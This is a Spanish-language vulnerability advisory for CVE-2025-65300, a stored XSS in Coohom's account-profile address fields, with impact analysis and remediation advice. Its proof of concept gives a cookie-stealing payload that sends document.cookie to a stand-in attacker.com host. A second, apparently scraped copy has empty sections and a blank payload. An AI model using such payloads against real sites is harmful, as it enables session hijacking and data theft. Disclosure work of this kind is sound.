
# Documentación de CVE-2025-65300: XSS almacenado en Coohom ## Resumen CVE-2025-65300 es una vulnerabilidad de Cross-Site Scripting (XSS) almacenado identificada en los campos de dirección del perfil de Configuración de la Cuenta de la plataforma SaaS Coohom. Esta vulnerabilidad permite a un atacante inyectar scripts maliciosos que se ejecutan en el navegador de las víctimas cuando visualizan el perfil comprometido. ## Detalles de la vulnerabilidad - **ID de CVE:** CVE-2025-65300 - **Tipo:** Cross-Site Scripting (XSS) almacenado - **Componente afectado:** Campos de dirección del perfil de Configuración de la Cuenta - **Plataforma:** Coohom (SaaS) - **Vector de ataque:** Remoto - **Complejidad del ataque:** Baja - **Privilegios requeridos:** Bajos (usuario autenticado) - **Impacto en la confidencialidad:** Alto - **Impacto en la integridad:** Alto - **Impacto en la disponibilidad:** Bajo ## PoC (Prueba de Concepto) El siguiente payload puede ser inyectado en los campos de dirección del perfil: ```html <script>alert(document.cookie)</script> ``` Alternativamente, se puede utilizar un payload más sigiloso: ```html <img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)"> ``` ## Análisis de impacto Un atacante autenticado puede explotar esta vulnerabilidad para: - **Robo de sesiones:** Capturar cookies de sesión de otros usuarios que visualicen el perfil comprometido. - **Suplantación de identidad:** Realizar acciones en nombre de la víctima dentro de la plataforma. - **Exfiltración de datos:** Acceder y extraer información sensible visible en el contexto de la página. - **Distribución de malware:** Redirigir a los usuarios a sitios maliciosos o descargar archivos dañinos. - **Defacement:** Modificar visualmente el contenido de la página para los visitantes. ## Recomendaciones de remediación ### Inmediatas 1. **Validación de entrada:** Implementar una validación estricta en el lado del servidor para todos los campos de dirección, rechazando caracteres y patrones sospechosos. 2. **Codificación de salida:** Aplicar codificación contextual (HTML, atributo, JavaScript, CSS) a todos los datos de usuario antes de renderizarlos. 3. **Política de Seguridad de Contenido (CSP):** Implementar una CSP estricta que restrinja la ejecución de scripts no confiables. ### A largo plazo 4. **Revisión de código:** Auditar el código fuente de la plataforma para identificar y corregir patrones de codificación inseguros. 5. **Pruebas de seguridad:** Integrar pruebas automatizadas de seguridad (SAST, DAST) en el ciclo de desarrollo. 6. **Parcheo:** Aplicar el parche oficial proporcionado por Coohom tan pronto como esté disponible. 7. **Monitorización:** Implementar mecanismos de detección de intentos de explotación de XSS en los registros del servidor. ## Referencias - [NVD - CVE-2025-65300](https://nvd.nist.gov/vuln/detail/CVE-2025-65300) - [OWASP - Cross-Site Scripting (XSS)](https://owasp.org/www-community/attacks/xss/) - [OWASP - Prevención de XSS](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
[Descripción]
CVE-2025-65300: Vulnerabilidad de Cross-Site Scripting (XSS) almacenado en la plataforma SaaS de Coohom
Fecha de divulgación: 2025-10-28 Última actualización: 2025-10-28 Reportero: Phisit Pupiw Proveedor: Coohom CWE: CWE-79 – Cross-Site Scripting
[Resumen]
Se identificó una vulnerabilidad de Cross-Site Scripting (XSS) almacenado en la plataforma SaaS de Coohom, dentro del módulo Account Settings → Profile → Address. La entrada proporcionada por el usuario almacenada en los campos City, State y Country/Region se renderiza de vuelta al cliente sin una sanitización adecuada ni codificación de salida sensible al contexto. Esto permite a los atacantes almacenar cargas útiles de JavaScript malicioso que se ejecutan cada vez que se visualiza el área de perfil afectada. El problema afecta a la compilación de producción feVersion=1760060603897 (verificado el 2025-10-28).
[Detalles de la vulnerabilidad]
El frontend renderiza los datos del usuario directamente desde "window.SAAS_ENV.userInfo.{city, state, country}" sin sanitización ni escape, lo que provoca XSS almacenado cuando las cargas útiles inyectadas se almacenan en la base de datos y posteriormente se muestran en la interfaz de usuario. Ejemplo de carga útil maliciosa "" Cuando esta carga útil se introduce en el campo City, se guarda y se recarga la página de perfil, se ejecuta JavaScript arbitrario en el navegador de la víctima.
[Componentes afectados]
Módulo: Account Settings → Profile → Address fields Campos: city, state, country Compilación de frontend afectada: feVersion=1760060603897 URL de producción: https://www.coohom.com/pub/saas/settings/account
[Impacto]
Un atacante puede realizar lo siguiente:
[Vector de ataque]
[Flujo de ataque]
[Prueba de concepto (PoC)]
Pasos para reproducir
[Recomendación]
[Referencias]
[Créditos]
Descubierto por : Phisit Pupiw